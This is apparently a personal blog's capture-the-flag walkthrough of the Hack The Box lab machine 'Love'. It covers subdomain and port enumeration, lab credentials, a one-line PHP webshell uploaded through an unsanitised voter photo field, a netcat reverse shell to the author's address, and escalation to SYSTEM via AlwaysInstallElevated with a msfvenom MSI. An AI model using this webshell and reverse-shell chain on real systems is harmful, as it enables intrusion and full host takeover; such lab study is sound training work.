HTB - Love
Easy Machine
Enumeration
Like allways, we start with our nmap command:
nmap -p- --open -sCV -sS --min-rate 5000 -n -Pn -vvv 10.10.10.239 -oN TargetedWeb page shows a voting system from
Enumerating subdomains we find "staging"
wfuzz -c -t 200 --hc=404 --hh=4388 -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H ¨Host: FUZZ.love.htb" love.htbIn this subdomain I find an input in which you had to enter an URL. Doing some tests, I see that i get response on my responder
tcpdump -i tun0
I couldn´t move forward from here, however, I tried scanning other ports the machine had opened according to my nmap scan (5000, 5986)
Scanning port 5000 show something interesting
Getting some creds:
admin:@LoveIsInTheAir!!!!Now we can Go back and log into /admin/login.php of the Voting System web page
Investigating the web, I discover that I can create voters, and their photo, does not sanitize php files, so I crafted a malicious php file and created my fake voter.
<?php system($_REQUEST['cmd']); ?>
Now, in images directory, I can find my php file
Shell as Phoebe
Using the php webshell we created previously, I just send a nc connection to my host
http://love.htb/images/shell.php?cmd=nc -e cmd 10.10.14.11 443
Shell as System
For System enumeration I decided to upload winpeas
Searching for some weak points in the output, I find that:
AlwaysInstallElevated = 1Now we just need to create an msfvenom payload and abuse this feature
After uploading, we use this msiexec command to gain our shell
msiexec /quiet /qn /i reverse.msi
That was all for today´s write up, Hope you´ve enjoyed it.
I will be uploading a new write up every weekend, so don´t forget to stay up to the blog 😄
You can use my social media to leave me your thoughts about the write ups 👍
Twitter: https://twitter.com/KrakenEU_
Linkedin: https://www.linkedin.com/in/i%C3%B1aki-tornos-572580177/
Github: https://github.com/KrakenEU/Last updated